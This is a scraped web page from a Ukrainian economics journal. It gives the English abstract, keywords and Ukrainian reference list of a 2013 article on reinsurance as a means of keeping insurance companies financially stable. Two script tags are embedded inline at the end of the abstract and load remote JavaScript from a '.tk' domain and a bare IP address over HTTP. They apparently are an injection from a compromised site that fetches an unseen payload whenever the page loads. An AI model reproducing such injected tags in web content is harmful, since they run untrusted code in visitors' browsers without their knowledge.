ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 368.2
Сторінка молодого науковця

Reinsurance as mechanism for providing of financial stability of insurance companies / Shulieshova I.V. // Ekonomika APK. - 2013. - № 2 - P. 124

An article studies the effect of reinsurance mechanism for financial stability of insurance companies. It was found that by the operations of reinsurance insurance company may effect the level of their ability to pay. At the present stage of development of the insurance market of reinsurance has some problems and drawbacks. Achievement of a sufficient level of financial stability is possible when the whole spectrum of reinsurance transactions, is fulfilled which requires improvement of the legal framework and regulations for reinsurance. Tabl.: 1. Refs: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: reinsurance, financial stability of the insurance company, the functions of reinsurance

References

 1. Бойко А.О. Оптимізація портфеля страхових компаній на основі застосування операцій перестрахування / А.О.Бойко // Гроші, фінанси та кредит. Актуальні проблеми економіки. - 2011 . - №1. - С. 160-170.
 2. Бойко А.О. Формалізації впливу перестрахування на рівень платоспроможності страхової компанії / А.О. Бойко // Інноваційна економіка. - 2011. - № 20. - С. 226-230.
 3. Козьменко О.В. Сучасний стан і перспективи розвитку ринку перестрахування в Україні / О.В. Козьменко, А.О. Бойко // Фінанси України. - 2011. - № 6. - С. 24-33.
 4. Лебединська Л.Д. Фактори забезпечення фінансової стійкості страхових компаній в глобальному середовищі / Л.Д. Лебединська, М. Ремнева // Фінанси. Банківська справа. - 2011. - № 1(1). - С. 113-120.
 5. Лопата О.О. Іноземне перестрахування як елемент забезпечення фінансової стійкості національного страхового ринку / О.О. Лопата, І.О. Лещинін // Науковий вісник НЛТУ України. - 2011. - № 21.9 - С. 225-230.
 6. Національна комісія, що здійснює державне регулювання у сфері ринків фінансових послуг [Електронний ресурс]. - Режим доступу: http://www.dfp.gov.ua/1060.html.
 7. Нечипорук Л.В. Особливості перестрахування в умовах глобалізації / Л.В. Нечипорук // Вісник національної юридичної академії ім. Ярослава Мудрого. - 2011. - № 2(5). - С. 49-56.
 8. Проблемы перестрахования в Украине [Електронний ресурс]. - TRISTAR - твой финансовый навигатор. 2012. - Режим доступу: http://tristar.com.Ua/1/art/problemy_perestrahovaniia_v_ukraine_13013.html.
 9. Теребус ОМ. Перестрахування та проблеми його розвитку в Україні / О.М. Теребус // Галицький економічний вісник. - 2009. - № 2. С. 105-109.
 10. Формування страхового ринку України в контексті сталого розвитку: науково-дослідна робота за темою: Науково-методичні засади розвитку ринку перестрахування в Україні / С.В. Леонов, Ю.С. Конопліна, В.Л. Пластун, О.С. Журавка, А.О. Бойко, А.Ю. Семеног; наук. керівник С.М. Козьменко // Державний вищий навчальний заклад "Українська академія банківської справи Національного банку України". Суми, 2011. - 184 с.
 11. Что такое перестрахование? [Електронний ресурс]. - Перестрахование. - Режим доступу: http://re-insurance.com.ua.
Read article: 13_02_23.pdf